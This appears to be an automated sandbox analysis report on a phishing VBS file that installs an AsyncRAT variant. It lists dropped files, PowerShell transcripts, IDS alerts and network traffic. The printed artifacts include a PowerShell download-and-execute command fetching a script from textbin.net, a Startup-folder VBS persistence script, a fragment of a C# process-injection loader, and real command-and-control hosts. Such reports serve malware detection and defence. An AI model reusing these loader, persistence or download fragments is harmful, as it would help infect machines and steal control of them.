Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryqqak7Ynqq3bPN5Dlq5J:+RI+ycuZhN8qakS3bPNnqX
MD5:	725CE01FB76BB92F32123E13137EB885
SHA1:	B64C8B9241F74CB1E649A1759505F1D37ACA5B45
SHA-256:	B0BFFE5EF7081B7D4D41BFEB424EAEADA7B000965019B0D087B28D221D8B4627
SHA-512:	C33D8D527B869B474E202B8A813D9A5EF356F8742043079ECA83C18F17E942A1C60F1AA4023A2E5C584A526E6566791F9892EF86C7E4C5D6BF2D859EFA751559
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.v.v.c.h.i.0.q...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...l.v.v.c.h.i.0.q...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.0.cs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	C++ source, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	15102
Entropy (8bit):	4.763851296298132
Encrypted:	false
SSDEEP:	192:d4FazHgDRO2fwldsgNA/DxRry0at6knscDiF1u74+mFXqvFuI:+Fa9ldsgNeL1at6oslF1u2avN
MD5:	5B28648A4E188B0EBDF2D5EDCDA61624
SHA1:	FAF0BA6C2EF8D8184881EDA8A276796449969E1C
SHA-256:	E92ACAFC5A9DD128B120809AAF76178275C3D22B13FB7CC2F0D9C624BEFED1B1
SHA-512:	972FCA6205F8927363B751FF51C6CF07C3B42F7CBD8FBE12C1098DF539118ECF3D3CE1AF3B5D376C8710ED183786FC911279FF81941ABA4202A11CA5670B9937
Malicious:	true
Preview:	.using System;..using System.Diagnostics;..using System.Runtime.InteropServices;..using System.Text;..using Microsoft.VisualBasic;..using System.Collections.Generic;....namespace GIT..{.. public sealed class Repository.. {.. public static void Execute(string path, byte[] payload).. {.. for (int i = 0; i < 5; i++).. {.. int readWrite = 0x0;.. NativeMethods.StartupInformation si = new NativeMethods.StartupInformation();.. NativeMethods.ProcessInformation pi = new NativeMethods.ProcessInformation();.. si.Size = (UInt32)(Marshal.SizeOf(typeof(NativeMethods.StartupInformation))); //Attention !.... try.. {.. bool createProc = NativeMethods.CreateProcessA(path, "", IntPtr.Zero, IntPtr.Zero, false, 0x00000004 \| 0x08000000, IntPtr.Zero, null, ref si, ref pi);.. if (!createProc).. {..

C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.cmdline

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	333
Entropy (8bit):	5.119249747464875
Encrypted:	false
SSDEEP:	6:pAu+H2L/0DjuM3RLBPWdy1MZ915N723fkNMZx0zxspRu6EXbB/N723fkNMZDH:p37L/UukvGZ91baMNyGcY6EXbBlaMNyb
MD5:	06858D5DB4A5FE6410BA9B19940A70A6
SHA1:	F84DDECC4A87C4851BB0B22DC251887FE8D5BACE
SHA-256:	1F2487D01D1323D7E04B9D23E1CFC64C294705CFCE9A4AEA0E5DC2F17D8C4221
SHA-512:	C05EF81DEEE07FDF54D028E4C65680840BE4F9DB6A231505291E6850F5B34588831CCA5DE10379BC0F98FF1911FDA732DF49CE8B8DB719962BAF3090C0A1E2B8
Malicious:	false
Preview:	./t:library /utf8output /R:"System.dll" /R:"System.Management.dll" /R:"System.Windows.Forms.dll" /R:"mscorlib.dll" /R:"Microsoft.VisualBasic.dll" /out:"C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.dll" /debug- /optimize+ /platform:X86 /unsafe /target:library "C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.0.cs"

C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	5.023016144578243
Encrypted:	false
SSDEEP:	192:krwrEuvXuse9L9kJfpesGCFoOQejfv0Lavl3WXDGgx:keVesgL9OfYDCKejH0Li3vgx
MD5:	697745438041AE8BBAAC6AEE5CA9B839
SHA1:	52B1726BF56C630693188DA5F8AE23854C43037B
SHA-256:	B7167470565733108E4C939E862F97A32F227D436205591F183517BB352BF646
SHA-512:	72DFD42CD2ED29CD392B0865FFE2FC94ADB009415E054C6378E5338F6AE438DEF236D625348E645E16928DE4F991CD90C89307C699C54398F473E6C207B48103
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!.....&...........E... ...`....... ....................................@..................................D..W....`............................................................................... ............... ..H............text...$%... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............,..............@..B.................E......H.......(*...............................................................0............8.............................(....(....}....~.....r...p~....~..... ....~.........o1.......-.s....z..<(..........4X(...... .............. .....(.....3.~......{......o........-%s....z~......{......o........-.s....z...)......~......{.......X.....o).......-.s....z....3.~......{......o-...,.s....z....PX(..........TX(.........~......{........ .0...@o!.......-.s....z~......{...........o%.......-.s

C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.out

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
Category:	modified
Size (bytes):	995
Entropy (8bit):	5.243668380083427
Encrypted:	false
SSDEEP:	24:KObuVMyIdnUCZXaMknEXb3aMkDOKaM5DqBVKVrdFAMBJT44a:fuR0UCZKMkMkOKxDcVKdBJc4a
MD5:	92D68A93FBD01D2D5DABB45CBB2BCC97
SHA1:	105C621A2CAD71603095BE3E41A552202CDE1D24
SHA-256:	7F076E2ED5C3DE4D0EF68D4D227D3D845FF3C82AED6C177A09DFFE99A25D7DC0
SHA-512:	5A8056005CFD1CB6C6C87BA65CE073151F636A47C979C07A67E5C97C2E7B3364461ABFD157E0B96BA94A94878D63414ED02A460F3BE38B7977FA96E78DD64825
Malicious:	false
Preview:	.C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Management.dll" /R:"System.Windows.Forms.dll" /R:"mscorlib.dll" /R:"Microsoft.VisualBasic.dll" /out:"C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.dll" /debug- /optimize+ /platform:X86 /unsafe /target:library "C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....warning CS1607: Assembly generation -- Referenced assembly 'mscorlib.dll' targets a different processor..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemLogin.vbs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	136
Entropy (8bit):	5.092976524862006
Encrypted:	false
SSDEEP:	3:jTF+m8nhWegSXnGQqPJH0wxMCLkFFCFKwOaHF5CmE3q1rh:jTdqhWeGQO0wKjFlaHS+rh
MD5:	EA566D4E85B14D4B5D1AE1DC2F76622F
SHA1:	9A8CB117545D8951466C5F645E12714F8BE4B2A2
SHA-256:	E7EBAAA98319F268F9079B57495C49947A05CB5C71A37FA1E34900C888523E5B
SHA-512:	4B1E025EE3803A8DFD1B4AA3183BFFBF45F0F70A59B2547CE2B0054DAD93B3B1024DDFE01C7B453EDB990A0A8556DCEBFDE19AA412B5041D16170F2C2A65C408
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	Set Obj = CreateObject("WScript.Shell")..Obj.Run "PowerShell -ExecutionPolicy RemoteSigned -File " & "C:\Users\Public\gia9ab2dg0.PS1", 0

C:\Users\user\Documents\20220516\PowerShell_transcript.841618.MEqVT+yD.20220516192930.txt

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	2427
Entropy (8bit):	5.476345661251233
Encrypted:	false
SSDEEP:	48:BZ0KvTL8oOS61jizE1rZ1KJaqDYB1ZK461jizE1rZ1KsZZH:BZ0WTL8N72zauoqDo1ZKB2zausZV
MD5:	94146906D1D0B30F384BC9BDB5EAED3C
SHA1:	DE9A6BE3CC1B063615123095007AB4078649B864
SHA-256:	8715CA2A8BC786C7C71DDFABC62BE0C393637F307355FA1AD3E1AEBF82258F64
SHA-512:	D233293784894028F8B4C9CD4D952FD8C139A5C51CC7C1159D1157F2C08D51FC6D716967B47A3BE274B7A85A84C1B2723856E4CACC0B4F95BC29C646AACB3754
Malicious:	false
Preview:	.**********************..Windows PowerShell transcript start..Start time: 20220516192931..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 841618 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy RemoteSigned -Command [System.Net.WebRequest] $Request = [System.Net.WebRequest]::Create('https://textbin.net/raw/gia9ab2dg0'); [System.Net.WebResponse] $Response = $Request.GetResponse(); [System.IO.Stream] $Stream = $Response.GetResponseStream(); [System.IO.StreamReader] $Reader = New-Object System.IO.StreamReader $Stream; [String] $FilePath = 'C:\Users\Public\gia9ab2dg0.PS1'; [String] $Command = [System.Text.Encoding]::UTF8.GetString(@(80,111,119,101,114,83,104,101,108,108,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32)); [System.IO.File]::WriteAllText($FilePath, $Read

C:\Users\user\Documents\20220516\PowerShell_transcript.841618.RBBMNgBb.20220516193001.txt

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1043
Entropy (8bit):	5.116593236701985
Encrypted:	false
SSDEEP:	24:BxSAQ7vBVL8x2DOXUW1bSWYyHjeTKKjX4CIym1ZJXwOigvgnxSAZq:BZUvTL8oOJlxqDYB1ZqOiXZZq
MD5:	744959ADC6EF14E3E878693258CBFC87
SHA1:	8B5628780C97BE3FA18942A482409C24E06DB32C
SHA-256:	02CF9F4F16428F8727CDB090FAE0D69A25E0FA9D332F57E3D80ED5554D183D1F
SHA-512:	0FE208B0BE00D28A164F953AA427160640AC2B4F590627441ECF242193C016EE76DB40A36E8E1093D2E171FC252840B9002FEE204FDCD858F750D8DB3B0E1E12
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20220516193003..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 841618 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy RemoteSigned -File C:\Users\Public\gia9ab2dg0.PS1..Process ID: 7116..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20220516193003..******************..PS>CommandInvocation(gia9ab2dg0.PS1): "gia9ab2dg0.PS1"..0..1..2..3..4..******************..Command start time: 20220516194023..******************..PS>$global:?..True..********************..Windows PowerShell transcript end..End tim

C:\Users\user\Documents\20220516\PowerShell_transcript.841618.f5mU45le.20220516192941.txt

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1042
Entropy (8bit):	5.124152018765392
Encrypted:	false
SSDEEP:	24:BxSA047vBVL8x2DOXUW1bSWHHjeTKKjX4CIym1ZJXcwOigv0nxSAZK:BZ0svTL8oOJlHqDYB1ZKwOiTZZK
MD5:	187B7ED50370CBDDCBEF263BB3C21DE1
SHA1:	21F6021B58B1BA9EF1821002F8A3B980DF230A77
SHA-256:	428616C73D1526A9890E94D2D16552142DB37D15597B55488273575302251BD8
SHA-512:	E02DEFE89823E27C6B298ACBA1D10E76939D58D969363C67EAECF8FCA4A9651C0942700139496214CE1BF4FB82C912001071CD8B1195AE2EB139E10894BE3998
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20220516192942..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 841618 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy RemoteSigned -File C:\Users\Public\gia9ab2dg0.PS1..Process ID: 924..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20220516192942..******************..PS>CommandInvocation(gia9ab2dg0.PS1): "gia9ab2dg0.PS1"..0..1..2..3..4..******************..Command start time: 20220516193800..******************..PS>$global:?..True..********************..Windows PowerShell transcript end..End time

Static File Info

General

File type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Entropy (8bit):	4.5450742907160055
TrID:
File name:	Re-RFQ - PN List.vbs
File size:	43700
MD5:	867aa07dd614380e5943bccd70fee675
SHA1:	b97d664bc1f9f8f3ba2819f17154e4d32618734c
SHA256:	35d11d86e996833469ee713fce6ba52dbcdcf3211e36985182f47040c2166ac9
SHA512:	51aa62bb0d8d7bcf379a87152f65722cb3d00662bac7cb1389fff0a326164817e67aed4f3990459497390fd9092efa4af70cde12f1c3c1b7bf5bc014a8b63abd
SSDEEP:	192:YQOyzLyFyT/COPgoiyhPj/2PjSc0XyoG6B0uKGP/ciIQuNEYMhH:PzesT/CQiE/sMGyJYNEnhH
TLSH:	9F13B750D9E237AEF08CDDFA985EC42BC2C454E1FED74EAC885DAE7198116B49B4804F
File Content Preview:	'%S0}1_YJ,;_3R,%?1X$3-B0/>UNPH4W=O(K!O{X%0:T<X~:9A6HO/QAM8X7JB3$;=DO4UNYR1FG>9+RH^-&302KZ$-6Y6:@6)F#H-0YL<S{#Q3</=TU^=T<7+1VD!0:;Q9#1C)DBRQG)A@C4(<^R+:=+GX1FV#6VBX(+5+D5R$7D/+S@?6TZ#^,XZ{(&++(^>M{,+LAP1_:T##\|_)ACV{FC*FT,+TDHG,G#;%HKLF)%+\|L

File Icon


Icon Hash:	e8d69ece869a9ec4

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
91.193.75.216192.168.2.69217497592848152 05/16/22-19:30:11.449233	TCP	2848152	ETPRO TROJAN Observed Malicious SSL Cert (AsyncRAT Variant)	9217	49759	91.193.75.216	192.168.2.6
91.193.75.216192.168.2.69217497592034847 05/16/22-19:30:11.449233	TCP	2034847	ET TROJAN Observed Malicious SSL Cert (AsyncRAT)	9217	49759	91.193.75.216	192.168.2.6

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 16, 2022 19:29:25.583755016 CEST	49732	1433	192.168.2.6	199.102.48.248
May 16, 2022 19:29:25.749480963 CEST	1433	49732	199.102.48.248	192.168.2.6
May 16, 2022 19:29:25.749751091 CEST	49732	1433	192.168.2.6	199.102.48.248
May 16, 2022 19:29:25.750066996 CEST	49732	1433	192.168.2.6	199.102.48.248
May 16, 2022 19:29:25.916713953 CEST	1433	49732	199.102.48.248	192.168.2.6
May 16, 2022 19:29:25.926120996 CEST	49732	1433	192.168.2.6	199.102.48.248
May 16, 2022 19:29:26.096271992 CEST	1433	49732	199.102.48.248	192.168.2.6
May 16, 2022 19:29:26.142754078 CEST	49732	1433	192.168.2.6	199.102.48.248
May 16, 2022 19:29:26.312984943 CEST	1433	49732	199.102.48.248	192.168.2.6
May 16, 2022 19:29:26.398729086 CEST	49732	1433	192.168.2.6	199.102.48.248
May 16, 2022 19:29:26.566886902 CEST	1433	49732	199.102.48.248	192.168.2.6
May 16, 2022 19:29:26.613223076 CEST	49732	1433	192.168.2.6	199.102.48.248
May 16, 2022 19:29:26.779700994 CEST	1433	49732	199.102.48.248	192.168.2.6
May 16, 2022 19:29:26.841624975 CEST	49732	1433	192.168.2.6	199.102.48.248
May 16, 2022 19:29:28.585848093 CEST	49732	1433	192.168.2.6	199.102.48.248
May 16, 2022 19:29:28.751506090 CEST	1433	49732	199.102.48.248	192.168.2.6
May 16, 2022 19:29:28.751575947 CEST	1433	49732	199.102.48.248	192.168.2.6
May 16, 2022 19:29:28.751646042 CEST	49732	1433	192.168.2.6	199.102.48.248
May 16, 2022 19:29:32.445399046 CEST	49736	443	192.168.2.6	148.72.177.212
May 16, 2022 19:29:32.445431948 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:32.445535898 CEST	49736	443	192.168.2.6	148.72.177.212
May 16, 2022 19:29:32.463372946 CEST	49736	443	192.168.2.6	148.72.177.212
May 16, 2022 19:29:32.463395119 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:32.740195036 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:32.740400076 CEST	49736	443	192.168.2.6	148.72.177.212
May 16, 2022 19:29:32.744647026 CEST	49736	443	192.168.2.6	148.72.177.212
May 16, 2022 19:29:32.744666100 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:32.745124102 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:32.767550945 CEST	49736	443	192.168.2.6	148.72.177.212
May 16, 2022 19:29:32.808511019 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:33.325170994 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:33.325243950 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:33.325254917 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:33.325309038 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:33.325320005 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:33.325337887 CEST	49736	443	192.168.2.6	148.72.177.212
May 16, 2022 19:29:33.325364113 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:33.325396061 CEST	49736	443	192.168.2.6	148.72.177.212
May 16, 2022 19:29:33.325443983 CEST	49736	443	192.168.2.6	148.72.177.212
May 16, 2022 19:29:33.325459957 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:33.325514078 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:33.325531960 CEST	49736	443	192.168.2.6	148.72.177.212
May 16, 2022 19:29:33.325537920 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:33.325566053 CEST	49736	443	192.168.2.6	148.72.177.212
May 16, 2022 19:29:33.325591087 CEST	49736	443	192.168.2.6	148.72.177.212
May 16, 2022 19:29:33.455578089 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:33.455651045 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:33.455728054 CEST	49736	443	192.168.2.6	148.72.177.212
May 16, 2022 19:29:33.455749035 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:33.455795050 CEST	49736	443	192.168.2.6	148.72.177.212
May 16, 2022 19:29:33.455802917 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:33.455825090 CEST	49736	443	192.168.2.6	148.72.177.212
May 16, 2022 19:29:33.455836058 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:33.455863953 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:33.455919981 CEST	49736	443	192.168.2.6	148.72.177.212
May 16, 2022 19:29:33.455930948 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:33.455960035 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:33.455979109 CEST	49736	443	192.168.2.6	148.72.177.212
May 16, 2022 19:29:33.456053019 CEST	49736	443	192.168.2.6	148.72.177.212
May 16, 2022 19:29:33.456053972 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:33.456127882 CEST	49736	443	192.168.2.6	148.72.177.212
May 16, 2022 19:29:39.377161026 CEST	49736	443	192.168.2.6	148.72.177.212
May 16, 2022 19:30:11.231482983 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:30:11.311487913 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:30:11.311681032 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:30:11.365575075 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:30:11.449233055 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:30:11.453147888 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:30:11.537846088 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:30:11.603240967 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:30:13.857485056 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:30:13.989433050 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:30:13.989521980 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:30:14.115329027 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:30:28.339171886 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:30:28.474633932 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:30:28.475187063 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:30:28.560847998 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:30:28.659367085 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:30:28.739330053 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:30:28.846860886 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:30:29.005824089 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:30:29.143980026 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:30:29.144100904 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:30:29.284409046 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:30:36.902765989 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:30:36.956994057 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:30:37.036195993 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:30:37.160083055 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:30:42.760745049 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:30:42.894182920 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:30:42.899678946 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:30:42.980964899 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:30:43.060327053 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:30:43.140104055 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:30:43.238131046 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:30:43.378133059 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:30:43.380743027 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:30:43.519058943 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:30:57.599153996 CEST	49759	9217	192.168.2.6	91.193.75.216

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 16, 2022 19:29:25.418298006 CEST	51748	53	192.168.2.6	8.8.8.8
May 16, 2022 19:29:25.580914021 CEST	53	51748	8.8.8.8	192.168.2.6
May 16, 2022 19:29:32.415848970 CEST	61116	53	192.168.2.6	8.8.8.8
May 16, 2022 19:29:32.434875965 CEST	53	61116	8.8.8.8	192.168.2.6
May 16, 2022 19:30:11.087301970 CEST	51666	53	192.168.2.6	8.8.8.8
May 16, 2022 19:30:11.223953962 CEST	53	51666	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 16, 2022 19:29:25.418298006 CEST	192.168.2.6	8.8.8.8	0x536d	Standard query (0)	SQL8003.site4now.net	A (IP address)	IN (0x0001)
May 16, 2022 19:29:32.415848970 CEST	192.168.2.6	8.8.8.8	0xfa49	Standard query (0)	textbin.net	A (IP address)	IN (0x0001)
May 16, 2022 19:30:11.087301970 CEST	192.168.2.6	8.8.8.8	0x6904	Standard query (0)	sky01.publicvm.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
May 16, 2022 19:29:25.580914021 CEST	8.8.8.8	192.168.2.6	0x536d	No error (0)	SQL8003.site4now.net	199.102.48.248	A (IP address)	IN (0x0001)
May 16, 2022 19:29:32.434875965 CEST	8.8.8.8	192.168.2.6	0xfa49	No error (0)	textbin.net	148.72.177.212	A (IP address)	IN (0x0001)
May 16, 2022 19:30:11.223953962 CEST	8.8.8.8	192.168.2.6	0x6904	No error (0)	sky01.publicvm.com	91.193.75.216	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

textbin.net

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49736	148.72.177.212	443	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
2022-05-16 17:29:32 UTC	0	OUT	GET /raw/gia9ab2dg0 HTTP/1.1 Host: textbin.net Connection: Keep-Alive
2022-05-16 17:29:33 UTC	0	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 May 2022 17:29:33 GMT Content-Type: text/plain; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/7.4.29 Cache-Control: private, must-revalidate pragma: no-cache expires: -1 X-RateLimit-Limit: 60 X-RateLimit-Remaining: 59 Set-Cookie: XSRF-TOKEN=eyJpdiI6IlFud2Q3ZldnVzFcL0d5TkI1XC9FOWVLZz09IiwidmFsdWUiOiJCenQ3TDBKUzFDZ3pqTkQ3V1laV25nc2l6YUJzUUdkUXJcL2xIU204Mm9XdWFacEpoN0cxTGlDMkhWM1JGbzVHQyIsIm1hYyI6IjhmNzg2MDkyNjAzNDlkNjhiMTU5ZTIxYTgwYjRhYTE4Y2JmNzljODM3MmE4YjE5ODBjNTUxZTg5ZmFlNWEyYmQifQ%3D%3D; expires=Mon, 16-May-2022 19:29:33 GMT; Max-Age=7200; path=/ Set-Cookie: textbin_session=eyJpdiI6InlISW13dTZuMEJHbkMrTlBUXC96QW5nPT0iLCJ2YWx1ZSI6IjJvKzV0ZERhMkpuU2xzZVdjN0tYaklZQjlCOXhkalwvSXBQTzZxcUZRUTlKZkNTQUV6Q1RPb3JsNkVTRWM1cDZvIiwibWFjIjoiZDhlYTM2OGIwODY1YTFjMDQ5YWI4MzJlZjBiZDcyYzIxNzQ5NmZkYjdhOTdiOWU0YmFiMzBkOTVhNTg0YTYwMSJ9; expires=Mon, 16-May-2022 19:29:33 GMT; Max-Age=7200; path=/; httponly Vary: Accept-Encoding Strict-Transport-Security: max-age=15768000; includeSubDomains X-Powered-By: PleskLin
